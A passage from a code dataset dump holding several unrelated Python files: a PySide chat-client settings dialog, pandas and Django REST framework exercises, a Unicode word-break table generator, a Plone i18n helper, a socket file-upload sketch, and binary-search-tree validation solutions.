QtWidgets.QLineEdit(self.formLayoutWidget)\n\t\tself.hostLine.setAcceptDrops(False)\n\t\tself.hostLine.setInputMethodHints(QtCore.Qt.ImhLatinOnly)\n\t\tself.hostLine.setText(\"\")\n\t\tself.hostLine.setMaxLength(40)\n\t\tself.hostLine.setObjectName(\"hostLine\")\n\t\tself.generalForm.setWidget(\n\t\t\t1, QtWidgets.QFormLayout.FieldRole, self.hostLine)\n\t\tself.loading_icon = QtWidgets.QPushButton(self.generalBox)\n\t\tself.loading_icon.setGeometry(QtCore.QRect(220, 13, 56, 56))\n\t\tself.loading_icon.setStyleSheet(\"QPushButton {\\n\"\n\t\t\t\t\t\t\t\t\t\t\"background-color: None;\\n\"\n\t\t\t\t\t\t\t\t\t\t\"border: none;\\n\"\n\t\t\t\t\t\t\t\t\t\t\"}\\n\"\n\t\t\t\t\t\t\t\t\t\t\"QPushButton:hover {\\n\"\n\t\t\t\t\t\t\t\t\t\t\"background-color: None;\\n\"\n\t\t\t\t\t\t\t\t\t\t\"}\")\n\t\tself.loading_icon.setText(\"\")\n\t\ticon1 = QtGui.QIcon()\n\t\ticon1.addPixmap(QtGui.QPixmap(\":/icons/icons/loading.png\"),\n\t\t\t\t\t\tQtGui.QIcon.Normal, 
QtGui.QIcon.Off)\n\t\tself.loading_icon.setIcon(icon1)\n\t\tself.loading_icon.setIconSize(QtCore.QSize(64, 64))\n\t\tself.loading_icon.setObjectName(\"loading_icon\")\n\t\tself.horizontalLayoutWidget = QtWidgets.QWidget(Dialog)\n\t\tself.horizontalLayoutWidget.setGeometry(QtCore.QRect(240, 90, 158, 41))\n\t\tself.horizontalLayoutWidget.setObjectName(\"horizontalLayoutWidget\")\n\t\tself.saveLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)\n\t\tself.saveLayout.setContentsMargins(0, 0, 0, 0)\n\t\tself.saveLayout.setObjectName(\"saveLayout\")\n\t\tself.saveButton = QtWidgets.QPushButton(self.horizontalLayoutWidget)\n\t\tself.saveButton.setObjectName(\"saveButton\")\n\t\tself.saveLayout.addWidget(self.saveButton)\n\t\tself.cancelButton = QtWidgets.QPushButton(self.horizontalLayoutWidget)\n\t\tself.cancelButton.setObjectName(\"cancelButton\")\n\t\tself.saveLayout.addWidget(self.cancelButton)\n\n\t\tself.retranslateUi(Dialog)\n\t\tQtCore.QMetaObject.connectSlotsByName(Dialog)\n\n\tdef retranslateUi(self, Dialog):\n\t\t_translate = QtCore.QCoreApplication.translate\n\t\tDialog.setWindowTitle(_translate(\"Dialog\", \"Settings\"))\n\t\tself.generalBox.setTitle(_translate(\"Dialog\", \"General\"))\n\t\tself.nicknameLabel.setText(_translate(\"Dialog\", \"Nickname\"))\n\t\tself.hostLabel.setText(_translate(\"Dialog\", \"Host\"))\n\t\tself.saveButton.setText(_translate(\"Dialog\", \"Save\"))\n\t\tself.cancelButton.setText(_translate(\"Dialog\", \"Cancel\"))\n\n\nclass Settings(QtWidgets.QDialog, Ui_Dialog):\n\tCONNECTION_SIGNAL = QtCore.Signal(bool, str, str)\n\n\tdef __init__(self, window, server, config):\n\t\tsuper().__init__()\n\t\tself.setupUi(self)\n\t\tself.loading(False)\n\n\t\tself.INCORRECT_NICKNAME = \"Invalid nickname.\" \\\n\t\t\t\t\t\t\t\t\t\"Your new nickname should not to: \" \\\n\t\t\t\t\t\t\t\t\t\"consists of spaces, \" \\\n\t\t\t\t\t\t\t\t\t\"been shorter than 3 syms\"\n\n\t\tself.NICKNAME_EXISTS = \"This nickname alreay taken\"\n\t\tself.INCORRECT_HOST = \"Having trouble trying to connect to specified host\"\n\n\t\tself.text = \"\"\n\t\tself.re_open = False\n\n\t\tself.window = window\n\t\tself.config = config\n\t\tself.server = server\n\n\t\tself.CONNECTION_SIGNAL.connect(self.on_connection)\n\t\tself.saveButton.clicked.connect(self.run_)\n\t\tself.cancelButton.clicked.connect(self.close_)\n\n\tdef run_(self):\n\t\t'''\n\t\tнажата кнопка save\n\t\t'''\n\n\t\tself.loading(True)\n\n\t\tself.window.listening_is_on(False)\n\t\tthread = Thread(target = self.run_in_thread)\n\t\tthread.start()\n\n\tdef run_in_thread(self):\n\t\tname = self.nicknameLine.text()\n\t\thost = self.hostLine.text()\n\t\t\n\t\tis_host_correct = self.check_connect_to_host(host)\n\n\t\tif is_host_correct:\n\t\t\tself.config.write(\"host\", host)\n\t\t\tself.window.read_config(host=True)\n\t\telse:\n\t\t\tprint(\"Host isn't correct!\")\n\t\t\treturn self.CONNECTION_SIGNAL.emit(is_host_correct, name, host)\n\n\t\tprint(f'''[{self.run_in_thread.__name__}]: Going to create connection, params:\n\t\t\t is_host_correct - {is_host_correct}, name - {name}, host - {host}...''')\n\n\t\treturn self.CONNECTION_SIGNAL.emit(is_host_correct, name, host)\n\n\tdef check_connect_to_host(self, host):\n\t\tprint(f\"[{self.check_connect_to_host.__name__}]: going to check connection...\", end=\"\")\n\n\t\tif self.server.respond and host == self.config.read(\"host\"):\n\t\t\tprint(\"connected.\")\n\t\t\treturn True\n\t\telif (self.server.respond and host != self.config.read(\"host\")) or not 
self.server.respond:\n\t\t\tprint(\"disconnected.\")\n\n\t\t\ttry:\n\t\t\t\tself.server.init(host)\n\t\t\texcept:\n\t\t\t\tself.text = self.INCORRECT_HOST\n\t\t\t\treturn False\n\n\t\t\tif not self.server.respond:\n\t\t\t\tself.text = self.INCORRECT_HOST\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tself.config.write(\"host\", self.server.host)\n\t\t\t\tself.window.read_config()\n\n\t\t\treturn True\n\n\t@QtCore.Slot() # from CONNECTION_SIGNAL\n\tdef on_connection(self, is_host_correct, name, host):\n\t\tself.loading(False)\n\n\t\tif not is_host_correct:\n\t\t\tself.window.info_window(self.text)\n\t\t\tself.re_open = True\n\t\t\treturn self.close()\n\n\t\tresult, self.text = self.name_is_correct(name)\n\n\t\tself.window.listening_is_on(True)\n\n\t\tif result:\n\t\t\tself.config.write(\"nickname\", name)\n\t\t\tself.window.read_config()\n\n\t\t\tif not self.window.connection_established:\n\t\t\t\tself.window.connect_to_server()\n\n\t\t\treturn self.close()\n\t\telse:\n\t\t\tself.window.info_window(self.text)\n\t\t\tself.re_open = True\n\t\t\treturn self.close()\n\n\tdef name_is_correct(self, name):\n\n\t\t# если имя введено корректно, то проверяем айпи, иначе выходим и говорим пользователю, что нужно исправить имя\n\n\t\tprint(f\"[{self.name_is_correct.__name__}]: Checking if nickname correct...\", end=\"\")\n\n\t\tif not name.isspace() and len(name) > 3 and name != \"\":\n\t\t\tprint(\"name format correct\")\n\t\t\tres_name = self.check_name(name)\n\t\telse:\n\t\t\tprint(\"name format isn't correct\")\n\t\t\treturn (False, self.INCORRECT_NICKNAME)\n\n\t\tif not res_name:\n\t\t\treturn (False, self.NICKNAME_EXISTS)\n\t\telse:\n\t\t\treturn (True, \"\")\n\n\tdef check_name(self, name):\n\t\tprint(f\"[{self.check_name.__name__}]: name {'!=' if name != self.config.read('nickname') else '=='} \" \\\n\t\t\t f\"self.config.read('nickname')...\", end=\"\")\n\n\t\tif name != self.config.read(\"nickname\"):\n\t\t\tprint(\"Checking nickname...\", end=\"\")\n\n\t\t\tself.server.method(\"user.getUsernames\")\n\n\t\t\tresult = self.window.get_data(\"usernames\")\n\n\t\t\tif name in result[\"usernames\"]:\n\t\t\t\tprint(\"nickname already taken...\")\n\t\t\t\treturn False\n\n\t\t\tif self.config.read(\"nickname\") == \"\":\n\t\t\t\tprint(\"OK...\", end=\"\")\n\n\t\t\t\tself.window.write_signal.emit(\n\t\t\t\t\tNICK_CHANGE, \"\", \"Your\", f\"{name}\", \"\")\n\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tself.server.method(NICK_CHANGE, {\"id\": self.config.read(\"user_id\"), \"nickname\": name})\n\n\t\treturn True\n\n\tdef close_(self):\n\t\t'''\n\t\tнажата кнопка cancel\n\t\t'''\n\n\t\tif self.window.connection_established:\n\t\t\tself.re_open = False\n\t\telse:\n\t\t\tself.re_open = True\n\t\t\n\t\tself.close()\n\n\tdef closeEvent(self, evnt):\n\t\t'''\n\t\tвызывается при знакрытии окна\n\t\t'''\n\n\t\tif self.window.connection_established:\n\t\t\tself.nicknameLine.setText(self.config.read(\"nickname\"))\n\t\t\tself.hostLine.setText(self.config.read(\"host\"))\n\t\t\tevnt.accept()\n\t\telse:\n\t\t\tif self.re_open:\n\t\t\t\tself.re_open = False\n\t\t\t\tevnt.accept()\n\t\t\telse:\n\t\t\t\tself.window.config.close()\n\t\t\t\tsys.exit(0)\n\n\tdef fields_filler(self, name=False, host=False):\n\t\tif (not name) and (not host):\n\t\t\tself.nicknameLine.setText(\"\")\n\t\t\t# http://127.0.0.1:5000\n\t\t\t# SadScream.pythonanywhere.com\n\t\t\tself.hostLine.setText(\"127.0.0.1:5000\")\n\t\telif name and (not host):\n\t\t\tself.nicknameLine.setText(name)\n\t\telif (not name) and 
host:\n\t\t\tself.hostLine.setText(host)\n\t\telif name and host:\n\t\t\tself.nicknameLine.setText(name)\n\t\t\tself.hostLine.setText(host)\t\n\n\tdef loading(self, state):\n\t\t'''\n\t\tstate: True/False\n\t\t'''\n\n\t\tif state:\n\t\t\tself.loading_icon.show()\n\t\telif not state:\n\t\t\tself.loading_icon.hide()\n\n\t\tself.saveLayout.setEnabled(not state)\n\t\tself.generalBox.setEnabled(not state)\n","sub_path":"application/ui/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":9948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"41243278","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 30 12:49:33 2018\n\n@author: vicser\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\n\ndataFrame = pd.read_csv('Kumpula-June-2016-w-metadata.csv', sep=',')\nprint(dataFrame)\n\ndataFrame['DIFF']=dataFrame['MAX']-dataFrame['MIN']\n\nprint(dataFrame)\ndataFrame['DIFF_Min'] = dataFrame['TEMP'] - dataFrame['MIN']\n\n# Create a new column and convert temp fahrenheit to celsius:\ndataFrame['TEMP_Celsius'] = (dataFrame['TEMP'] - 32) / (9/5)\n\n\nprint(dataFrame)\n\n\n# Select first five rows of dataframe\n\nw_temps = dataFrame.loc[dataFrame['YEARMODA'] >= 20160615]\nprint(w_temps)\n\nw_temps2 = dataFrame.loc[(dataFrame['TEMP_Celsius'] > 15) &(dataFrame['YEARMODA'] >= 20160615)]\nprint(w_temps2)\n\nw_temps2 = w_temps2.reset_index(drop=True)\nprint(w_temps2)\nw_temps3=w_temps2;\n\n# Set temp_celsius as none in the first five rows\nw_temps3.loc[:4, 'TEMP_Celsius'] = None\nprint(w_temps3)\n\n# Drop no data values based on temp_celsius column\nw_temps_clean = w_temps3.dropna(subset=['TEMP_Celsius'])\n#w_temps_clean = w_temps2.fillna(0)\n\nprint(w_temps_clean.reset_index(drop=True))\n\n\n# Sort dataframe, ascending\nsorted_temp_a = dataFrame.sort_values(by='TEMP', ascending=False)\n\nprint(sorted_temp_a)\n\n# Create new column, and round celsius values\ndataFrame['Celsius_rounded'] = dataFrame['TEMP_Celsius'].round(0)\nprint(dataFrame)\n\n# Get unique celsius values\nunique = dataFrame['Celsius_rounded'].unique()\nprint(list(unique))\n\n\n# define output filename\noutput_fp = \"Kumpula_temps_June_2016.csv\"\n\n# Save dataframe to csv\ndataFrame.to_csv(output_fp, sep=',', index=False, float_format=\"%.2f\")\n\n# Specify output filename\nexcel_output_fp = \"Kumpula_temps_above15_June_2016.xlsx\"\n\n# Initialize ExcelWriter\nwriter = pd.ExcelWriter(excel_output_fp)\n\n#Write data to excel\nw_temps.to_excel(writer, sheet_name=\"Kumpula_temperatures\", index=False, float_format=\"%.1f\")\n\n\n\n\n\n\n\n\n\n\n\n\n\ns = pd.Series([1,3,5,np.nan,6,8])\ndates = pd.date_range('20130101',periods=6)\ndf = pd.DataFrame(np.random.randn(6,4),index=dates,columns=list('ABCD'))\n\n","sub_path":"ProcesingPanda.py","file_name":"ProcesingPanda.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"71548398","text":"from datetime import datetime\nfrom django.utils import timezone\nfrom django.utils.six import BytesIO\n\nimport os,django\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"gamesAPI.settings\")\ndjango.setup()\n\n# Parser and renders handle as mediators between python primitives and HTTP requests and responses\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom games.models import Game\nfrom games.serializers import 
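# Hedged, standalone sketch of the threading pattern the Settings dialog above uses:
# blocking work runs on a plain Thread, and the result is handed back to the GUI thread
# by emitting a Qt Signal (class and slot names here are illustrative, not from the record):
from PySide2 import QtCore
from threading import Thread

class ConnectWorker(QtCore.QObject):
    done = QtCore.Signal(bool, str)          # mirrors the role of CONNECTION_SIGNAL

    def start(self):
        Thread(target=self._work).start()    # keep the GUI event loop responsive

    def _work(self):
        self.done.emit(True, 'connected')    # delivered queued to the receiver's thread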
GameSerializer\n\n\ngamedatetime=timezone.make_aware(datetime.now(),timezone.get_current_timezone())\ngame1=Game(name='name1', release_date=gamedatetime, game_category='2D mobile arcade', played=False)\ngame1.save()\ngame2=Game(name='name2', release_date=gamedatetime, game_category='3D RPG', played=False)\ngame2.save()\n# After we execute the preceding code, we notice the table has two rows and the columns have the values we have provided\n\n# Serialize the first game instance (game1)\ngame_serializer1=GameSerializer(game1)\nprint(game_serializer1.data)\n\n# Serialize the second game instance (game2)\ngame_serializer2=GameSerializer(game2)\nprint(game_serializer2.data)\n# output:\n# The following line shows the generated dictionary, specifically, a rest_framework.utils.serializer_helpers.ReturnDict instance\n# {'release_date': '2016-05-18T03:02:00.776594Z', 'game_category': '3D RPG', 'played': False, 'pk': 2, 'name': 'name2'}\n\n# We can easily render the dictionaries held in the data attribute into JSON with the help of the rest_framework.renderers.JSONRenderer class\nrenderer=JSONRenderer()\nrendered_game1=renderer.render(game_serializer1.data)\nrendered_game2=renderer.render(game_serializer2.data)\nprint(rendered_game1)\nprint(rendered_game2)\n\n\n# from serialized data to the population of a Game instance\njson_string_for_new_game='{\"name\":\"name_1\",\"release_date\":\"2017-08-15T03:02:00.883334Z\",\"game_category\":\"3D RPG\",\"played\":false}'\n# convert the string to bytes\njson_bytes_for_new_game=bytes(json_string_for_new_game,encoding='UTF-8')\n# The django.utils.six.BytesIO class provides a buffered I/O implementation using an in-memory bytes buffer.\nstream_for_new_game=BytesIO(json_bytes_for_new_game)\n\n# We can easily deserialize and parse a stream into the Python models with the help of the rest_framework.parsers.JSONParser class\nparser=JSONParser() # create an instance of this class\n# Parses the stream into Python native datatypes and saves the results in the parsed_new_game variable\nparsed_new_game=parser.parse(stream_for_new_game)\nprint(parsed_new_game)\n\nnew_game_serializer=GameSerializer(data=parsed_new_game)\n# Note that we must always call is_valid before we attempt to access the serialized data representation when we pass a data keyword argument\n# in the creation of a serializer\nif new_game_serializer.is_valid():\n    # calls the save method that inserts the corresponding row in the database and returns a fully populated Game instance, saved in the new_game local variable\n    new_game=new_game_serializer.save()\n    print('test')\n    print(new_game.name)","sub_path":"gamesAPI/testSerializer.py","file_name":"testSerializer.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"102733178","text":"#!/usr/bin/env python3\n\n# Copyright 2016 Patrick O. 
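# Hedged complementary sketch for the serializer record above: when is_valid() returns
# False, DRF exposes the validation details on serializer.errors (the invalid payload
# below is hypothetical):
bad_serializer = GameSerializer(data={'name': ''})
if not bad_serializer.is_valid():
    print(bad_serializer.errors)   # e.g. {'name': ['This field may not be blank.']}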
Perry.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport math\n\ntry:\n import property\n import unicode_data\nexcept ModuleNotFoundError:\n from util import property\n from util import unicode_data\n\n\nWORD_BREAK_PROPERTY = \"data/ucd/auxiliary/WordBreakProperty.txt\"\nPROP_LIST = \"data/ucd/PropList.txt\"\nDERIVED_CORE_PROPERTIES = \"data/ucd/DerivedCoreProperties.txt\"\n\ncode_props = property.read(WORD_BREAK_PROPERTY)\nword_break_property = property.read(WORD_BREAK_PROPERTY, sets=True)\n\nprop_list = property.read(PROP_LIST, sets=True)\nwhite_space = prop_list['White_Space']\n\nderived_core_properties = property.read(DERIVED_CORE_PROPERTIES, sets=True)\ndefault_ignorable = derived_core_properties['Default_Ignorable_Code_Point']\n\n# add the default ignorables to the white space category\nwhite_space = white_space.union(default_ignorable)\n\nletter = set()\n#mark = set()\nnumber = set()\nother = set()\npunctuation = set()\nsymbol = set()\nletter_cats = set(('Ll', 'Lm', 'Lo', 'Lt', 'Lu', 'Nl'))\n#mark_cats = set(('Mc', 'Me', 'Mn'))\nnumber_cats = set(('Nd', 'No')) # Note: Nl in 'letter'\nother_cats = set(('Cc', 'Cf', 'Cs', 'Co', 'Cn'))\npunctuation_cats = set(('Pc', 'Pd', 'Pe', 'Pf', 'Pi', 'Po', 'Ps'))\nsymbol_cats = set(('Sc', 'Sk', 'Sm', 'So'))\n\nfor code in range(len(unicode_data.uchars)):\n u = unicode_data.uchars[code]\n if u is None or u.category in other_cats:\n other.add(code)\n elif u.category in letter_cats:\n letter.add(code)\n# elif u.category in mark_cats:\n# mark.add(code)\n elif u.category in number_cats:\n number.add(code)\n elif u.category in punctuation_cats:\n punctuation.add(code)\n elif u.category in symbol_cats:\n symbol.add(code)\n\n# reclassify legacy punctuation as 'Symbol'\nfor ch in ['#', '%', '&', '@']:\n punctuation.remove(ord(ch))\n symbol.add(ord(ch))\n # fullwidth versions\n wch = 0xFEE0 + ord(ch)\n punctuation.remove(wch)\n symbol.add(wch)\n\n\nprop_names = set(code_props)\nprop_names.remove(None)\n\nassert 'Letter' not in prop_names\nassert 'Mark' not in prop_names\nassert 'Number' not in prop_names\nassert 'Other' not in prop_names\nassert 'Punctuation' not in prop_names\nassert 'Symbol' not in prop_names\nassert 'White_Space' not in prop_names\nprop_names.add('Letter')\nprop_names.add('Number')\n#prop_names.add('Mark')\nprop_names.add('Other')\nprop_names.add('Punctuation')\nprop_names.add('Symbol')\nprop_names.add('White_Space')\n\nfor code in range(len(code_props)):\n if code_props[code] is None:\n if code in white_space:\n code_props[code] = 'White_Space'\n elif code in letter:\n code_props[code] = 'Letter'\n# elif code in mark:\n# code_props[code] = 'Mark'\n elif code in number:\n code_props[code] = 'Number'\n elif code in other:\n code_props[code] = 'Other'\n elif code in punctuation:\n code_props[code] = 'Punctuation'\n elif code in symbol:\n code_props[code] = 'Symbol'\n\n# override the hyphen property (default is 'Punctuation')\nprop_names.add('Hyphen')\ncode_props[0x002D] = 'Hyphen' # HYPHEN-MINUS\ncode_props[0x058A] = 'Hyphen' # 
ARMENIAN HYPHEN\ncode_props[0x05BE] = 'Hyphen' # HEBREW PUNCTUATION MAQAF\ncode_props[0x1400] = 'Hyphen' # CANADIAN SYLLABICS HYPHEN\ncode_props[0x1806] = 'Hyphen' # MONGOLIAN TODO SOFT HYPHEN\ncode_props[0x2010] = 'Hyphen' # HYPHEN\ncode_props[0x2011] = 'Hyphen' # NON-BREAKING HYPHEN\ncode_props[0x2E17] = 'Hyphen' # DOUBLE OBLIQUE HYPHEN\ncode_props[0x2E1A] = 'Hyphen' # HYPHEN WITH DIAERESIS\ncode_props[0x2E40] = 'Hyphen' # DOUBLE HYPHEN\ncode_props[0x30A0] = 'Hyphen' # KATAKANA-HIRAGANA DOUBLE HYPHEN\ncode_props[0xFE63] = 'Hyphen' # SMALL HYPHEN-MINUS\ncode_props[0xFF0D] = 'Hyphen' # FULLWIDTH HYPHEN-MINUS\n\n# extra MidLetter properties\n# TR#29: \"Some or all of the following characters may be tailored to be in\n# MidLetter, depending on the environment: \ncode_props[0x055A] = 'MidLetter' # ARMENIAN APOSTROPHE\ncode_props[0x0F0B] = 'MidLetter' # TIBETAN MARK INTERSYLLABIC TSHEG\ncode_props[0x201B] = 'MidLetter' # SINGLE HIGH-REVERSED-9 QUOTATION MARK\ncode_props[0x30FB] = 'MidLetter' # KATAKANA MIDDLE DOT\n\n# make sure we didn't miss anything\nfor code in range(len(code_props)):\n if code_props[code] is None:\n u = unicode_data.uchars[code]\n print('Uncagetorized code point:')\n print('U+{:04X}'.format(code), u.category, u.name)\n assert False\n\nprop_vals = {}\nprop_vals['None'] = 0;\nfor p in sorted(prop_names):\n prop_vals[p] = len(prop_vals)\n\n\ndef compute_tables(block_size):\n nblock = len(code_props) // block_size\n stage1 = [None] * nblock\n stage2 = []\n stage2_dict = {}\n for i in range(nblock):\n begin = i * block_size\n end = begin + block_size\n block = tuple(code_props[begin:end])\n if block in stage2_dict:\n j = stage2_dict[block]\n else:\n j = len(stage2)\n stage2_dict[block] = j\n stage2.append(block)\n stage1[i] = j\n return (stage1,stage2)\n\n\ndef stage1_item_size(nstage2):\n nbyte = math.ceil(math.log(nstage2, 2) / 8)\n size = 2**math.ceil(math.log(nbyte, 2))\n return size\n\npage_size = 4096\nblock_size = 256\n\nnbytes = {}\n\nbest_block_size = 1\nsmallest_size = len(code_props)\n\nfor i in range(1,17):\n block_size = 2**i\n stage1,stage2 = compute_tables(block_size)\n\n nbyte1 = len(stage1) * stage1_item_size(len(stage2))\n nbyte2 = len(stage2) * block_size\n\n nbyte1 = math.ceil(nbyte1 / page_size) * page_size\n nbyte2 = math.ceil(nbyte2 / page_size) * page_size\n nbyte = nbyte1 + nbyte2\n nbytes[block_size] = nbyte\n\n if nbyte < smallest_size:\n smallest_size = nbyte\n best_block_size = block_size\n\n\nblock_size = best_block_size\nstage1,stage2 = compute_tables(block_size)\n\ntype1_size = stage1_item_size(len(stage2))\n\nif type1_size == 1:\n type1 = 'uint8_t'\nelif type1_size == 2:\n type1 = 'uint16_t'\nelif type1_size == 4:\n type1 = 'uint32_t'\nelse:\n type1 = 'uint64_t'\n\ntype2 = 'int8_t'\n\n\n# Write wordbreakprop.h to stdout\n\nprint(\"/* This file is automatically generated. DO NOT EDIT!\")\nprint(\" Instead, edit gen-wordbreak.py and re-run. 
*/\")\nprint(\"\")\nprint(\"/*\")\nprint(\" * Unicode Word_Break property values.\")\nprint(\" *\")\nprint(\" * Defined in UAX #29 \\\"Unicode Text Segmentation\\\"\")\nprint(\" *\")\nprint(\" * http://www.unicode.org/reports/tr29/\")\nprint(\" *\")\nprint(\" * Section 4.1, Table 3.\")\nprint(\" *\")\nprint(\" *\")\nprint(\" * We use the two-stage lookup strategy described at\")\nprint(\" *\")\nprint(\" * http://www.strchr.com/multi-stage_tables\")\nprint(\" *\")\nprint(\" */\")\nprint(\"\")\nprint(\"#ifndef WORDBREAKPROP_H\")\nprint(\"#define WORDBREAKPROP_H\")\nprint(\"\")\nprint(\"#include \")\nprint(\"\")\nprint(\"enum word_break_prop {\")\nprint(\"\\tWORD_BREAK_NONE = 0\", end=\"\")\nfor prop in sorted(prop_names):\n print(\",\\n\\tWORD_BREAK_\" + prop.upper() + \" = \" + str(prop_vals[prop]),\n end=\"\")\nprint(\"\\n};\")\nprint(\"\")\nprint(\"static const \" + type1 + \" word_break_stage1[] = {\")\nfor i in range(len(stage1) - 1):\n if i % 16 == 0:\n print(\"/* U+{:04X} */\".format(i * block_size), end=\"\")\n print(\"{0: >3},\".format(stage1[i]), end=\"\")\n if i % 16 == 15:\n print(\"\")\nprint(\"{0: >3}\".format(stage1[len(stage1) - 1]))\nprint(\"};\")\nprint(\"\")\nprint(\"static const \" + type2 + \" word_break_stage2[][\" +\n str(block_size) + \"] = {\")\n#for i in range(len(stage2)):\nfor i in range(0,len(stage2)):\n print(\" /* block \" + str(i) + \" */\")\n print(\" {\", end=\"\")\n for j in range(block_size):\n print(\"{0: >3}\".format(prop_vals[stage2[i][j]]), end=\"\")\n if j + 1 == block_size:\n print(\"\\n }\", end=\"\")\n else:\n print(\",\", end=\"\")\n if j % 16 == 15:\n print(\"\\n \", end=\"\")\n if i + 1 != len(stage2):\n print(\",\\n\")\n else:\n print(\"\")\nprint(\"};\")\n\nprint(\"\")\nprint(\"static int word_break(int32_t code)\")\nprint(\"{\")\nprint(\"\\tconst int32_t block_size = \" + str(block_size) + \";\")\nprint(\"\\t\" + type1 + \" i = word_break_stage1[code / block_size];\")\nprint(\"\\treturn word_break_stage2[i][code % block_size];\")\nprint(\"}\")\nprint(\"\")\nprint(\"#endif /* WORDBREAKPROP_H */\")\n","sub_path":"src/corpus/util/gen-wordbreak.py","file_name":"gen-wordbreak.py","file_ext":"py","file_size_in_byte":8760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"14367815","text":"from zope.i18nmessageid import MessageFactory\nfrom zope.i18n import translate\nfrom zope.i18nmessageid import Message\n\nimport six\n\n\nPloneMessageFactory = MessageFactory('plone')\n\nif six.PY2:\n def safe_unicode(value):\n if isinstance(value, unicode):\n return value\n elif isinstance(value, str):\n try:\n return unicode(value, 'utf-8')\n except UnicodeDecodeError:\n return unicode(value, 'utf-8', 'ignore')\n return str(value)\nelse:\n def safe_unicode(value):\n return value\n\n\ndef recursiveTranslate(message, **kwargs):\n \"\"\"translates also the message mappings before translating the message.\n if kwargs['REQUEST'] is None, return the message untranslated\n \"\"\"\n\n request = kwargs.get('REQUEST',None)\n\n map = message.mapping\n if map:\n for key in map.keys():\n if type(map[key]) == Message:\n map[key] = translate(map[key], context=request)\n\n return translate(message, context=request)\n","sub_path":"Products/validation/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307223625","text":"from django.test import TestCase\n\n# Create your tests here.\n# -*- coding: utf-8 
-*-\nimport re\n\na = re.match('^(?!_)(?!.*?_$)[a-zA-Z0-9_\\u4e00-\\u9fa5]+$', '123')\nif a == None:\n print(\"hi\")\nprint(a)\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nengine = create_engine(\"mysql+pymysql://root:root@localhost:3306/ly\")\nsql = '''select * from tb_login;'''\ndf = pd.read_sql_query(sql, engine)\nprint(df)\ndf = pd.DataFrame({'id': [1, 2, 3, 4], 'num': [12, 34, 56, 89]})\ndf.to_sql('hi', engine, if_exists='append', index=False)\n\ndf = pd.read_csv(r'./page.csv', encoding='GBK', sep=',')\ndf.to_sql('page', engine, if_exists='append', index=False)\n\n\n","sub_path":"backend/love/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374439269","text":"import socket\nimport json \nimport hashlib\n\n# sock=socket.socket()\n# sock.bind(('192.168.31.194',65320))\n# sock.listen(5)\n\n# while 1:\n# print('服务器工作中。。。。')\n# conn,addr=sock.accept()\n# while 1:\n# data=conn.recv(1024).decode('utf8')\n# file_info=json.loads(data)\n# print(file_info)\n \n# action=file_info.get('action')\n# filename=file_info.get('filename')\n# filesize=file_info.get('filesize')\n \n# conn.send(b'200')\n# res=filename.split('\\\\')[-1]\n \n \n# with open('put/'+res,'ab') as f:\n# recv_data_length=0\n# all_data=b''\n# while recv_data_length bool:\n # empty tree\n if not root: \n return True\n # without children\n if not root.left and not root.right: \n return True\n # with only right child\n if not root.left:\n if self.isValidBST(root.right):\n node = root.right\n while node.left:\n node = node.left\n if node.val > root.val:\n return True\n else:\n return False\n else:\n return False\n # with only left child\n if not root.right:\n if self.isValidBST(root.left):\n node = root.left\n while node.right:\n node = node.right\n if node.val < root.val:\n return True\n else:\n return False\n else:\n return False\n # with both children\n if self.isValidBST(root.left):\n node = root.left\n while node.right:\n node = node.right\n if node.val >= root.val:\n return False\n else:\n return False\n if self.isValidBST(root.right):\n node = root.right\n while node.left:\n node = node.left\n if node.val <= root.val:\n return False\n else:\n return False\n return True\n \n # Recursion\n def isValidBST(self, root: TreeNode) -> bool:\n def helper(node, lower=float('-inf'), upper=float('inf')):\n if not node:\n return True\n val = node.val\n if not lower < val < upper:\n return False\n if not helper(node.left, lower, val):\n return False\n if not helper(node.right, val, upper):\n return False\n return True\n return helper(root)\n \n # Iteration\n def isValidBST(self, root: TreeNode) -> bool:\n if not root: return True\n stack = [(root, float('-inf'), float('inf'))]\n while stack:\n node, lower, upper = stack.pop()\n if not node:\n continue\n val = node.val\n if not lower < val < upper:\n return False\n stack.append((node.left, lower, val))\n stack.append((node.right, val, upper))\n return True\n\n # Inorder traversal\n def isValidBST(self, root: TreeNode) -> bool:\n output = self.inOrder(root)\n for i in range(1, len(output)):\n if output[i - 1] >= output[i]:\n return False\n return True\n def inOrder(self, root):\n if not root: return []\n return self.inOrder(root.left) + [root.val] + 
